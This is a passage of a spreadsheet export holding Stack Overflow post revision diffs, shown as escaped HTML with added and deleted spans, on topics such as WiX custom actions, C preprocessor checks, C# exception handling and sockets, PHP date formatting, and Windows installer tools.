&amp;lt;CustomAction Id="Do" Execute="deferred" BinaryKey="MyDLL" DllEntry="DoThing" Return="check"/&amp;gt;_x000D_
&amp;lt;CustomAction Id="SetForRollbackUndo" Execute="immediate" Property="RollbackUndo" Value="[MYPROP]"/&amp;gt;_x000D_
&amp;lt;CustomAction Id="RollbackUndo" Execute="rollback" BinaryKey="MyDLL" DllEntry="DoThing" Return="ignore"/&amp;gt;_x000D_
&amp;lt;CustomAction Id="SetForUndo" Execute="immediate" Property="Undo" Value="[MYPROP]"/&amp;gt;_x000D_
&amp;lt;CustomAction Id="Undo" Execute="deferred" BinaryKey="MyDLL" DllEntry="UndoThing" Return="check"/&amp;gt;_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; And eight within the &lt;code&gt;InstallExecuteSequence&lt;/code&gt;, like so:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;&amp;lt;Custom Action="SetForRollbackDo" &lt;span class="diff-delete"&gt;After="InstallFiles"&amp;gt;REMOVE&amp;lt;&amp;gt;"ALL"&amp;lt;&lt;/span&gt;/Custom&amp;gt;_x000D_
&amp;lt;Custom Action="RollbackDo" &lt;span class="diff-delete"&gt;After="SetForRollbackDo"&amp;gt;REMOVE&amp;lt;&amp;gt;"ALL"&amp;lt;&lt;/span&gt;/Custom&amp;gt;_x000D_
&amp;lt;Custom Action="SetForDo" &lt;span class="diff-delete"&gt;After="RollbackDo"&amp;gt;REMOVE&amp;lt;&amp;gt;"ALL"&amp;lt;&lt;/span&gt;/Custom&amp;gt;_x000D_
&amp;lt;Custom Action="Do" &lt;span class="diff-delete"&gt;After="SetForDo"&amp;gt;REMOVE&amp;lt;&amp;gt;"ALL"&amp;lt;&lt;/span&gt;/Custom&amp;gt;_x000D_
&amp;lt;Custom Action="SetForRollbackUndo" After="InstallInitialize"&amp;gt;REMOVE="ALL"&amp;lt;/Custom&amp;gt;_x000D_
&amp;lt;Custom Action="RollbackUndo" After="SetForRollbackUndo"&amp;gt;REMOVE="ALL"&amp;lt;/Custom&amp;gt;_x000D_
&amp;lt;Custom Action="SetForUndo" After="RollbackUndo"&amp;gt;REMOVE="ALL"&amp;lt;/Custom&amp;gt;_x000D_
&amp;lt;Custom Action="Undo" After="SetForUndo"&amp;gt;REMOVE="ALL"&amp;lt;/Custom&amp;gt;_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; Is there a better way?&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; I have a wix installer and a single custom action (plus undo and rollback) for it which uses a property from the installer. The custom action has to happen after all the files are on the hard disk. It seems that you need 16 entries in the wxs file for this; eight within the root, like so:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;&amp;lt;CustomAction Id="SetForRollbackDo" Execute="immediate" Property="RollbackDo" Value="[MYPROP]"/&amp;gt;_x000D_
&amp;lt;CustomAction Id="RollbackDo" Execute="rollback" BinaryKey="MyDLL" DllEntry="UndoThing" Return="ignore"/&amp;gt;_x000D_
&amp;lt;CustomAction Id="SetForDo" Execute="immediate" Property="Do" Value="[MYPROP]"/&amp;gt;_x000D_
&amp;lt;CustomAction Id="Do" Execute="deferred" BinaryKey="MyDLL" DllEntry="DoThing" Return="check"/&amp;gt;_x000D_
&amp;lt;CustomAction Id="SetForRollbackUndo" Execute="immediate" Property="RollbackUndo" Value="[MYPROP]"/&amp;gt;_x000D_
&amp;lt;CustomAction Id="RollbackUndo" Execute="rollback" BinaryKey="MyDLL" DllEntry="DoThing" Return="ignore"/&amp;gt;_x000D_
&amp;lt;CustomAction Id="SetForUndo" Execute="immediate" Property="Undo" Value="[MYPROP]"/&amp;gt;_x000D_
&amp;lt;CustomAction Id="Undo" Execute="deferred" BinaryKey="MyDLL" DllEntry="UndoThing" Return="check"/&amp;gt;_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; And eight within the &lt;code&gt;InstallExecuteSequence&lt;/code&gt;, like so:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;&amp;lt;Custom Action="SetForRollbackDo" &lt;span class="diff-add"&gt;After="InstallFiles"&amp;gt;REMOVE&amp;amp;lt;&amp;gt;"ALL"&amp;lt;&lt;/span&gt;/Custom&amp;gt;_x000D_
&amp;lt;Custom Action="RollbackDo" &lt;span class="diff-add"&gt;After="SetForRollbackDo"&amp;gt;REMOVE&amp;amp;lt;&amp;gt;"ALL"&amp;lt;&lt;/span&gt;/Custom&amp;gt;_x000D_
&amp;lt;Custom Action="SetForDo" &lt;span class="diff-add"&gt;After="RollbackDo"&amp;gt;REMOVE&amp;amp;lt;&amp;gt;"ALL"&amp;lt;&lt;/span&gt;/Custom&amp;gt;_x000D_
&amp;lt;Custom Action="Do" &lt;span class="diff-add"&gt;After="SetForDo"&amp;gt;REMOVE&amp;amp;lt;&amp;gt;"ALL"&amp;lt;&lt;/span&gt;/Custom&amp;gt;_x000D_
&amp;lt;Custom Action="SetForRollbackUndo" After="InstallInitialize"&amp;gt;REMOVE="ALL"&amp;lt;/Custom&amp;gt;_x000D_
&amp;lt;Custom Action="RollbackUndo" After="SetForRollbackUndo"&amp;gt;REMOVE="ALL"&amp;lt;/Custom&amp;gt;_x000D_
&amp;lt;Custom Action="SetForUndo" After="RollbackUndo"&amp;gt;REMOVE="ALL"&amp;lt;/Custom&amp;gt;_x000D_
&amp;lt;Custom Action="Undo" After="SetForUndo"&amp;gt;REMOVE="ALL"&amp;lt;/Custom&amp;gt;_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; Is there a better way?&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Ry</t>
  </si>
  <si>
    <t>azhrei</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; My initial reaction was '#ifdef, of course', but I think #if actually has some significant advantages for this - here's why:&lt;/p&gt; _x000D_
 &lt;p&gt; First, you can use 'DEBUG_ENABLED' in preprocessor &lt;em&gt;&lt;span class="diff-delete"&gt;and&lt;/span&gt;&lt;/em&gt; compiled tests. Example - Often, I want longer timeouts when debug is enabled, so using #if, I can write this&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;  DoSomethingSlowWithTimeout(DEBUG_ENABLED? 5000 : 1000);_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt;... instead of ...&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;#ifdef DEBUG_MODE_x000D_
  DoSomethingSlowWithTimeout(5000);_x000D_
#else_x000D_
  DoSomethingSlowWithTimeout(1000);_x000D_
#endif_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; Second, you're in a better position if you want to migrate from a #define to a global constant. #defines are usually frowned on by most C++ programmers.&lt;/p&gt; _x000D_
 &lt;p&gt; And, Third, you say you've a divide in your team. My guess is this means different members have already adopted different approaches, and you need to standardise. Ruling that #if is the preferred choice means that code using #ifdef will compile -and run- even when DEBUG_ENABLED is false. And it's &lt;em&gt;much&lt;/em&gt; easier to track down and remove debug output that is produced when it shouldn't be than vice-versa.&lt;/p&gt; _x000D_
 &lt;p&gt; Oh, and a minor readability point. You should be able to use true/false rather than 0/1 in your #define, and because the value is a single lexical token, it's the one time you don't need parentheses around it.&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;#define DEBUG_ENABLED true_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; instead of&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;#define DEBUG_ENABLED (1)_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
 &lt;hr&gt; _x000D_
 &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-delete"&gt; Improving an almost 5-year old answer feels weird, but @barnes53 makes another important point: &lt;/span&gt;&lt;code&gt;&lt;span class="diff-delete"&gt;#if&lt;/span&gt;&lt;/code&gt;&lt;span class="diff-delete"&gt; also protects against typos: &lt;/span&gt;&lt;code&gt;&lt;span class="diff-delete"&gt;#ifdef DEBUG_ENBALED&lt;/span&gt;&lt;/code&gt;&lt;span class="diff-delete"&gt; is is always silently skipped, while the equivalent &lt;/span&gt;&lt;code&gt;&lt;span class="diff-delete"&gt;#if&lt;/span&gt;&lt;/code&gt;&lt;span class="diff-delete"&gt; will be detected as an error by the pre-processor,&lt;/span&gt;&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; My initial reaction was '#ifdef, of course', but I think #if actually has some significant advantages for this - here's why:&lt;/p&gt; _x000D_
 &lt;p&gt; First, you can use 'DEBUG_ENABLED' in preprocessor &lt;strong&gt;&lt;span class="diff-add"&gt;and&lt;/span&gt;&lt;/strong&gt; compiled tests. Example - Often, I want longer timeouts when debug is enabled, so using #if, I can write this&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;  DoSomethingSlowWithTimeout(DEBUG_ENABLED? 5000 : 1000);_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt;... instead of ...&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;#ifdef DEBUG_MODE_x000D_
  DoSomethingSlowWithTimeout(5000);_x000D_
#else_x000D_
  DoSomethingSlowWithTimeout(1000);_x000D_
#endif_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; Second, you're in a better position if you want to migrate from a #define to a global constant. #defines are usually frowned on by most C++ programmers.&lt;/p&gt; _x000D_
 &lt;p&gt; And, Third, you say you've a divide in your team. My guess is this means different members have already adopted different approaches, and you need to standardise. Ruling that #if is the preferred choice means that code using #ifdef will compile -and run- even when DEBUG_ENABLED is false. And it's &lt;em&gt;much&lt;/em&gt; easier to track down and remove debug output that is produced when it shouldn't be than vice-versa.&lt;/p&gt; _x000D_
 &lt;p&gt; Oh, and a minor readability point. You should be able to use true/false rather than 0/1 in your #define, and because the value is a single lexical token, it's the one time you don't need parentheses around it.&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;#define DEBUG_ENABLED true_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; instead of&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;#define DEBUG_ENABLED (1)_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Roddy</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; Catch &lt;code&gt;System.Exception&lt;/code&gt; and switch on the types&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;catch (Exception ex)            _x000D_
{                _x000D_
    if (ex is FormatException || ex is OverflowException)_x000D_
    {_x000D_
        WebId = Guid.Empty;_x000D_
        return;_x000D_
    }_x000D_
    _x000D_
    throw;_x000D_
}_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;hr&gt; _x000D_
 &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-delete"&gt; As several answers in this thread now say (upvote them as well), since C# 6 it is much better to use:&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;&lt;span class="diff-delete"&gt;catch (Exception ex) when (ex is FormatException || ex is OverflowException)           _x000D_
{                _x000D_
    WebId = Guid.Empty;_x000D_
    return;_x000D_
}_x000D_
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-delete"&gt; The reason why it is better, is that we avoid the mild corruption of the stack trace introduced by &lt;/span&gt;&lt;code&gt;&lt;span class="diff-delete"&gt;throw;&lt;/span&gt;&lt;/code&gt;&lt;span class="diff-delete"&gt; in the original (pre-C# 6) approach. This will really only catch the desired cases.&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; Catch &lt;code&gt;System.Exception&lt;/code&gt; and switch on the types&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;catch (Exception ex)            _x000D_
{                _x000D_
    if (ex is FormatException || ex is OverflowException)_x000D_
    {_x000D_
        WebId = Guid.Empty;_x000D_
        return;_x000D_
    }_x000D_
    _x000D_
    throw;_x000D_
}_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Joe</t>
  </si>
  <si>
    <t>Jeppe Stig Nielsen</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; Assuming you mean through a TCP socket:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;IPAddress &lt;span class="diff-delete"&gt;ip&lt;/span&gt; =&lt;span class="diff-delete"&gt; null;_x000D_
int&lt;/span&gt; &lt;span class="diff-delete"&gt;port =&lt;/span&gt; &lt;span class="diff-delete"&gt;80;&lt;/span&gt;_x000D_
if(&lt;span class="diff-delete"&gt;IPAddress&lt;/span&gt;.TryParse("127.0.0.1",out &lt;span class="diff-delete"&gt;ip&lt;/span&gt;)){_x000D_
    Socket s = new Socket(AddressFamily.InterNetwork,_x000D_
    SocketType.Stream,_x000D_
    ProtocolType.Tcp);_x000D_
_x000D_
    try{   _x000D_
        s.Connect(&lt;span class="diff-delete"&gt;ip&lt;/span&gt;, port);_x000D_
    }_x000D_
    catch(Exception ex){_x000D_
        // something went wrong_x000D_
    }_x000D_
}_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; For more information: &lt;a href="http://msdn.microsoft.com/en-us/library/4xzx2d41.aspx?ppud=4" rel="nofollow noreferrer"&gt;http://msdn.microsoft.com/en-us/library/4xzx2d41.aspx?ppud=4&lt;/a&gt;&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; Assuming you mean through a TCP socket:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;IPAddress &lt;span class="diff-add"&gt;IP&lt;/span&gt; = &lt;span class="diff-add"&gt;new&lt;/span&gt; &lt;span class="diff-add"&gt;IPAddress();&lt;/span&gt;_x000D_
if(&lt;span class="diff-add"&gt;IP&lt;/span&gt;.TryParse("127.0.0.1",out &lt;span class="diff-add"&gt;IP&lt;/span&gt;)){_x000D_
    Socket s = new Socket(AddressFamily.InterNetwork,_x000D_
    SocketType.Stream,_x000D_
    ProtocolType.Tcp);_x000D_
_x000D_
    try{   _x000D_
        s.Connect(&lt;span class="diff-add"&gt;IPs[0]&lt;/span&gt;, port);_x000D_
    }_x000D_
    catch(Exception ex){_x000D_
        // something went wrong_x000D_
    }_x000D_
}_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; For more information: &lt;a href="http://msdn.microsoft.com/en-us/library/4xzx2d41.aspx?ppud=4" rel="nofollow noreferrer"&gt;http://msdn.microsoft.com/en-us/library/4xzx2d41.aspx?ppud=4&lt;/a&gt;&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Jirapong</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt;&lt;a href="https://stackoverflow.com/users/15168/jonathan-leffler"&gt;&lt;span class="diff-delete"&gt;@Jonathan&lt;/span&gt;&lt;/a&gt;,&lt;/p&gt; _x000D_
 &lt;p&gt; I believe this is the solution you're talking about:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;void genknuth(int m, int n)_x000D_
{    for (int i = 0; i &amp;lt; n; i++)_x000D_
         /* select m of remaining n-i */_x000D_
         if ((bigrand() % (n-i)) &amp;lt; m) {_x000D_
             cout &amp;lt;&amp;lt; i &amp;lt;&amp;lt; "\n";_x000D_
             m--;_x000D_
         }_x000D_
}_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; It's on page 127 of Programming Pearls by Jon Bentley and is based off of Knuth's implementation.&lt;/p&gt; _x000D_
 &lt;p&gt; EDIT: I just saw a further modification on page 129:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;void genshuf(int m, int n)_x000D_
{    int i,j;_x000D_
     int *x = new int[n];_x000D_
     for (i = 0; i &amp;lt; n; i++)_x000D_
         x[i] = i;_x000D_
     for (i = 0; i &amp;lt; m; i++) {_x000D_
         j = randint(i, n-1);_x000D_
         int t = x[i]; x[i] = x[j]; x[j] = t;_x000D_
     }_x000D_
     sort(x, x+m);_x000D_
     for (i = 0; i&amp;lt; m; i++)_x000D_
         cout &amp;lt;&amp;lt; x[i] &amp;lt;&amp;lt; "\n";_x000D_
}_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; This is based on the idea that&lt;/p&gt; _x000D_
 &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
 &lt;blockquote&gt; _x000D_
  &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
  &lt;p&gt;&lt;span class="diff-delete"&gt; "...we need shuffle only the first &lt;/span&gt;&lt;em&gt;&lt;span class="diff-delete"&gt;m&lt;/span&gt;&lt;/em&gt;&lt;span class="diff-delete"&gt; elements of the array..."&lt;/span&gt;&lt;/p&gt; _x000D_
  &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
 &lt;/blockquote&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-add"&gt; @Jonathan&lt;/span&gt;,&lt;/p&gt; _x000D_
 &lt;p&gt; I believe this is the solution you're talking about:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;void genknuth(int m, int n)_x000D_
{    for (int i = 0; i &amp;lt; n; i++)_x000D_
         /* select m of remaining n-i */_x000D_
         if ((bigrand() % (n-i)) &amp;lt; m) {_x000D_
             cout &amp;lt;&amp;lt; i &amp;lt;&amp;lt; "\n";_x000D_
             m--;_x000D_
         }_x000D_
}_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; It's on page 127 of Programming Pearls by Jon Bentley and is based off of Knuth's implementation.&lt;/p&gt; _x000D_
 &lt;p&gt; EDIT: I just saw a further modification on page 129:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;void genshuf(int m, int n)_x000D_
{    int i,j;_x000D_
     int *x = new int[n];_x000D_
     for (i = 0; i &amp;lt; n; i++)_x000D_
         x[i] = i;_x000D_
     for (i = 0; i &amp;lt; m; i++) {_x000D_
         j = randint(i, n-1);_x000D_
         int t = x[i]; x[i] = x[j]; x[j] = t;_x000D_
     }_x000D_
     sort(x, x+m);_x000D_
     for (i = 0; i&amp;lt; m; i++)_x000D_
         cout &amp;lt;&amp;lt; x[i] &amp;lt;&amp;lt; "\n";_x000D_
}_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; This is based on the idea that&lt;span class="diff-add"&gt; "...we need shuffle only the first &lt;/span&gt;&lt;em&gt;&lt;span class="diff-add"&gt;m&lt;/span&gt;&lt;/em&gt;&lt;span class="diff-add"&gt; elements of the array..."&lt;/span&gt;&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>too honest for this site</t>
  </si>
  <si>
    <t>Md. Abu Nafee Ibna Zahid</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; This worked the best for me:&lt;/p&gt; _x000D_
 &lt;pre class="default s-code-block hljs php"&gt;&lt;code&gt;&lt;span class="hljs-variable"&gt;$datetime&lt;/span&gt; = strtotime(&lt;span class="hljs-variable"&gt;$row&lt;/span&gt;-&amp;gt;createdate);_x000D_
&lt;span class="hljs-variable"&gt;$mysqldate&lt;/span&gt; = date(&lt;span class="diff-delete"&gt;&lt;span class="hljs-string"&gt;"Y-m-&lt;/span&gt;&lt;/span&gt;&lt;span class="hljs-string"&gt;d &lt;/span&gt;&lt;span class="diff-delete"&gt;&lt;span class="hljs-string"&gt;H&lt;/span&gt;&lt;/span&gt;&lt;span class="hljs-string"&gt;:i&lt;/span&gt;&lt;span class="diff-delete"&gt;&lt;span class="hljs-string"&gt;:s"&lt;/span&gt;&lt;/span&gt;, &lt;span class="hljs-variable"&gt;$datetime&lt;/span&gt;);_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; This worked the best for me:&lt;/p&gt; _x000D_
 &lt;pre class="default s-code-block hljs php"&gt;&lt;code&gt;&lt;span class="hljs-variable"&gt;$datetime&lt;/span&gt; = strtotime(&lt;span class="hljs-variable"&gt;$row&lt;/span&gt;-&amp;gt;createdate);_x000D_
&lt;span class="hljs-variable"&gt;$mysqldate&lt;/span&gt; = date(&lt;span class="diff-add"&gt;&lt;span class="hljs-string"&gt;"m/&lt;/span&gt;&lt;/span&gt;&lt;span class="hljs-string"&gt;d&lt;/span&gt;&lt;span class="diff-add"&gt;&lt;span class="hljs-string"&gt;/y&lt;/span&gt;&lt;/span&gt;&lt;span class="hljs-string"&gt; &lt;/span&gt;&lt;span class="diff-add"&gt;&lt;span class="hljs-string"&gt;g&lt;/span&gt;&lt;/span&gt;&lt;span class="hljs-string"&gt;:i&lt;/span&gt;&lt;span class="diff-add"&gt;&lt;span class="hljs-string"&gt; A"&lt;/span&gt;&lt;/span&gt;, &lt;span class="hljs-variable"&gt;$datetime&lt;/span&gt;);_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Richard J. Ross III</t>
  </si>
  <si>
    <t>Shamoon</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; What's the difference between using a define statement and an enum statement in C/C++? (and is there any difference when using them with either C or C++?)&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-delete"&gt; For example, when should one use&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
 &lt;pre class="default s-code-block hljs java"&gt;&lt;code&gt;&lt;span class="diff-delete"&gt;&lt;span class="hljs-class"&gt;&lt;span class="hljs-keyword"&gt;enum&lt;/span&gt; &lt;/span&gt;{BUFFER = &lt;span class="hljs-number"&gt;1234&lt;/span&gt;}; _x000D_
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-delete"&gt; over&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
 &lt;pre class="default s-code-block hljs csharp"&gt;&lt;code&gt;&lt;span class="diff-delete"&gt;&lt;span class="hljs-meta"&gt;#&lt;span class="hljs-meta-keyword"&gt;define&lt;/span&gt; BUFFER 1234   &lt;/span&gt;_x000D_
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
 &lt;p&gt; Thanks&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; What's the difference between using a define statement and an enum statement in C/C++? (and is there any difference when using them with either C or C++?)&lt;/p&gt; _x000D_
 &lt;p&gt; Thanks&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; Create ControlTemplate for the TextBlock and put a TextBox inside with readonly property set. Or just use TextBox and make it readonly, then you can change the TextBox.Style to make it looks like TextBlock&lt;span class="diff-delete"&gt;.&lt;/span&gt;&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; Create ControlTemplate for the TextBlock and put a TextBox inside with readonly property set. Or just use TextBox and make it readonly, then you can change the TextBox.Style to make it looks like TextBlock&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Hamlet Hakobyan</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; I'd like to get a feel for what people are using for IoC containers. I've read some good things about Castle Windsor, but I know a lot of people use StructureMap, Unity, Ninject, etc.&lt;/p&gt; _x000D_
 &lt;p&gt; What are some of the differences amongst those mentioned (and any I neglected). Strengths? Weaknesses? Better fit (like StructureMap is great for ABC but not so good for XYZ)?&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-delete"&gt; Duplicate:&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
 &lt;p&gt;&lt;a href="http://stackoverflow.com/questions/71041/which-single-iocdi-container-would-you-recommend-using-and-why"&gt;&lt;span class="diff-delete"&gt;http://stackoverflow.com/questions/71041/which-single-iocdi-container-would-you-recommend-using-and-why&lt;/span&gt;&lt;/a&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; I'd like to get a feel for what people are using for IoC containers. I've read some good things about Castle Windsor, but I know a lot of people use StructureMap, Unity, Ninject, etc.&lt;/p&gt; _x000D_
 &lt;p&gt; What are some of the differences amongst those mentioned (and any I neglected). Strengths? Weaknesses? Better fit (like StructureMap is great for ABC but not so good for XYZ)?&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>SCdF</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;h2&gt;Free installers for Windows developers (ultimate list)&lt;/h2&gt; _x000D_
 &lt;p&gt; &lt;span class="diff-delete"&gt;Still work in&lt;/span&gt; progress..&lt;span class="diff-delete"&gt; I forgot to tick "&lt;/span&gt;&lt;em&gt;&lt;span class="diff-delete"&gt;Community editable&lt;/span&gt;&lt;/em&gt;&lt;span class="diff-delete"&gt;", could someone with more reputation do it?&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;strong&gt;&lt;a href="http://wix.sourceforge.net/" rel="nofollow noreferrer"&gt;WiX&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt; _x000D_
 &lt;ul&gt; _x000D_
  &lt;li&gt;&lt;strong&gt;Very powerful and flexible&lt;/strong&gt;.&lt;/li&gt; _x000D_
  &lt;li&gt; Can produce MSI packages&lt;/li&gt; _x000D_
  &lt;li&gt;&lt;strong&gt;Almost no documentation&lt;/strong&gt;&lt;/li&gt; _x000D_
  &lt;li&gt;&lt;strong&gt;Very steep learning curve.&lt;/strong&gt;&lt;/li&gt; _x000D_
  &lt;li&gt; XML-based.&lt;/li&gt; _x000D_
  &lt;li&gt; Recommended for very complex installators.&lt;/li&gt; _x000D_
 &lt;/ul&gt; _x000D_
 &lt;p&gt;&lt;strong&gt;&lt;a href="http://www.innosetup.com/isinfo.php" rel="nofollow noreferrer"&gt;InnoSetup&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt; _x000D_
 &lt;ul&gt; _x000D_
  &lt;li&gt; Cannot produce MSI packages.&lt;/li&gt; _x000D_
  &lt;li&gt;&lt;strong&gt;Based on INI files (less powerful but very low learning curve)&lt;/strong&gt;&lt;/li&gt; _x000D_
  &lt;li&gt; Possibily to inject Pascal procedures for extra flexibility.&lt;/li&gt; _x000D_
  &lt;li&gt;&lt;strong&gt;Probably the best choice for 90% of programs.&lt;/strong&gt;&lt;/li&gt; _x000D_
 &lt;/ul&gt; _x000D_
 &lt;p&gt;&lt;strong&gt;&lt;a href="http://nsis.sourceforge.net/Main_Page" rel="nofollow noreferrer"&gt;NSIS&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt; _x000D_
 &lt;ul&gt; _x000D_
  &lt;li&gt; Cannot produce MSI packages.&lt;/li&gt; _x000D_
  &lt;li&gt; Fully scripted, very powerful but at cost of high learning curve.&lt;/li&gt; _x000D_
  &lt;li&gt;&lt;strong&gt;Recommened if WiX is too much and InnoSetup is not enough.&lt;/strong&gt;&lt;/li&gt; _x000D_
 &lt;/ul&gt; _x000D_
 &lt;p&gt;&lt;strong&gt;&lt;a href="http://www.advancedinstaller.com" rel="nofollow noreferrer"&gt;AdvancedInstaller&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt; _x000D_
 &lt;ul&gt; _x000D_
  &lt;li&gt; Basic version is free.&lt;/li&gt; _x000D_
  &lt;li&gt; Can produce MSI packages.&lt;/li&gt; _x000D_
  &lt;li&gt;&lt;strong&gt;It has the best user-interface, almost no learning curve to get things done.&lt;/strong&gt;&lt;/li&gt; _x000D_
